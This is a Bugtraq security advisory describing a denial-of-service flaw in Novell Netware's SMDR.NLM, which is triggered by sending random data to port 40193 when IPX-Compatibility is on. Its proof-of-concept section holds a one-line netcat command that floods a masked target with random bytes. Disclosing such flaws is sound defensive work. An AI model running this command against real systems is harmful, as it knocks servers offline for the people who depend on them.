Novell Netware SMDR.NLM Denial of Service Vulnerability
BID:1467
Info
Novell Netware SMDR.NLM Denial of Service Vulnerability
| Bugtraq ID: | 1467 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 11 2000 12:00AM |
| Updated: | Jul 11 2000 12:00AM |
| Credit: | Posted to BugTraq on July 11, 2000 by Dimuthu Parussalla" <[email protected]> |
| Vulnerable: |
Novell Netware 6.0 SP1 Novell Netware 5.0 SP5 |
| Not Vulnerable: | |
Discussion
Novell Netware SMDR.NLM Denial of Service Vulnerability
When Novell Netware is configured with IPX-Compatibility enabled, it is vulnerable to a denial of service attack by sending packets with random data to port 40193. Similar results are possible by sending fragmented packets. This has been observed on Novell Netware 5.0 service pack 5, other versions may be vulnerable.
This behaviour has also been reported on Novell Netware 6.0 service pack 1.
It should be noted that configuration of Netware with IPX is not supported and it is not advised for production servers.
When Novell Netware is configured with IPX-Compatibility enabled, it is vulnerable to a denial of service attack by sending packets with random data to port 40193. Similar results are possible by sending fragmented packets. This has been observed on Novell Netware 5.0 service pack 5, other versions may be vulnerable.
This behaviour has also been reported on Novell Netware 6.0 service pack 1.
It should be noted that configuration of Netware with IPX is not supported and it is not advised for production servers.
Exploit / POC
Novell Netware SMDR.NLM Denial of Service Vulnerability
Using the tool 'netcat':
# cat /dev/urandom | nc XXX.XXX.XXX.XXX 40193
Using the tool 'netcat':
# cat /dev/urandom | nc XXX.XXX.XXX.XXX 40193
Solution / Fix
Novell Netware SMDR.NLM Denial of Service Vulnerability
Solution:
IPX-Compatibility should not be enabled on production servers.
Solution:
IPX-Compatibility should not be enabled on production servers.
References
Novell Netware SMDR.NLM Denial of Service Vulnerability
References:
References: